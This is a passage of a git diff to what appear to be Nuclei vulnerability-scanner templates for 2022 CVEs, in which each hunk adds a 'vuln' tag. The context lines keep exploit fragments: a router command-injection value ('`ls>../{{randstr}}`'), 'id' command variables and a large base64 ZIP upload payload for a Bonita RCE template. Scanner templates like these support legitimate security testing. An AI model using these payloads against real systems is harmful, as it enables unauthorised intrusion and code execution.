-37,7 +37,7 @@ info: google-query: - intitle:"icinga" - intitle:"icinga web 2 login" - tags: cve,cve2022,packetstorm,icinga,lfi,vkev + tags: cve,cve2022,packetstorm,icinga,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 71abe12cf7e..fafa3cd33c0 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="GeoServer" - app="geoserver" - tags: cve,cve2022,geoserver,rce,geosolutionsgroup,kev,vkev + tags: cve,cve2022,geoserver,rce,geosolutionsgroup,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24819.yaml b/http/cves/2022/CVE-2022-24819.yaml index b9410610914..5e8ea477e29 100644 --- a/http/cves/2022/CVE-2022-24819.yaml +++ b/http/cves/2022/CVE-2022-24819.yaml @@ -27,7 +27,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2022,xwiki,exposure + tags: cve,cve2022,xwiki,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index b5adeb03772..67055626319 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: flyte product: flyte_console - tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte + tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 16583093774..ebc6d385d24 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -30,7 +30,7 @@ info: vendor: wavlink product: wl-wn535k2 shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,cve,iot,wavlink,router,rce,oast,vkev + tags: cve2022,cve,iot,wavlink,router,rce,oast,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 967d4cb2312..ce7e1987b01 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -33,7 +33,7 @@ info: - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev + tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev,vuln variables: cmd: "id" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 47b388afc47..2fabbe1d601 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -34,7 +34,7 @@ info: - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev + tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 175c824c805..f07af9d0fdc 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -36,7 +36,7 @@ info: - body="contao open source cms" - title="contao" google-query: intitle:"contao" - tags: cve,cve2022,contao,xss,huntr + tags: cve,cve2022,contao,xss,huntr,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 891d716cf7f..4b6302afd8f 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: piano_led_visualizer_project product: piano_led_visualizer - tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project + tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index fea441800d8..db2498c9e6f 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -30,7 +30,7 @@ info: shodan-query: - "TerraMaster" - terramaster - tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master,vkev + tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25061.yaml b/http/cves/2022/CVE-2022-25061.yaml index 57eb9247105..7b2bd00fb0e 100644 --- a/http/cves/2022/CVE-2022-25061.yaml +++ b/http/cves/2022/CVE-2022-25061.yaml @@ -27,7 +27,7 @@ info: vendor: tp-link product: tl-wr840n_firmware shodan-query: 'title:"TL-WR840N"' - tags: cve,cve2022,tplink,router,rce,iot,authenticated + tags: cve,cve2022,tplink,router,rce,iot,authenticated,vuln variables: filename: "{{to_lower(rand_text_alpha(3))}}" diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 4c0e8b3e53c..4937534dce2 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: totolink product: a950rg_firmware - tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive,vkev + tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive,vkev,vuln variables: cmd: "`ls>../{{randstr}}`" diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 2849056566a..72c8293b6d4 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:1464851260 - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms,mingsoft + tags: cve,cve2022,sqli,mcms,mingsoft,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 01d2877317c..5e2e50fa742 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 825497dbad2..7e79632a5b0 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: "/wp-content/plugins/wp-statistics/" google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based-sqli,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based-sqli,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index 45e97113eb8..1a36cae811c 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dvdfab product: 12_player - tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab + tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25226.yaml b/http/cves/2022/CVE-2022-25226.yaml index 131bb36d509..6bcccb85be4 100644 --- a/http/cves/2022/CVE-2022-25226.yaml +++ b/http/cves/2022/CVE-2022-25226.yaml @@ -24,7 +24,7 @@ info: product: thinvnc shodan-query: http.favicon.hash:-1414548363 fofa-query: icon_hash="571240285" - tags: cve,cve2022,thinvnc,auth-bypass + tags: cve,cve2022,thinvnc,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-25237.yaml b/http/cves/2022/CVE-2022-25237.yaml index c098de15c71..6fead2478bf 100644 --- a/http/cves/2022/CVE-2022-25237.yaml +++ b/http/cves/2022/CVE-2022-25237.yaml @@ -29,7 +29,7 @@ info: product: bonita shodan-query: 'http.title:"Bonita" || "Server: Bonita"' fofa-query: 'title="Bonita" || header="Server: Bonita"' - tags: cve,cve2022,bonita,auth-bypass,intrusive,file-upload,rce,vkev + tags: cve,cve2022,bonita,auth-bypass,intrusive,file-upload,rce,vkev,vuln variables: zipdata: "{{base64_decode('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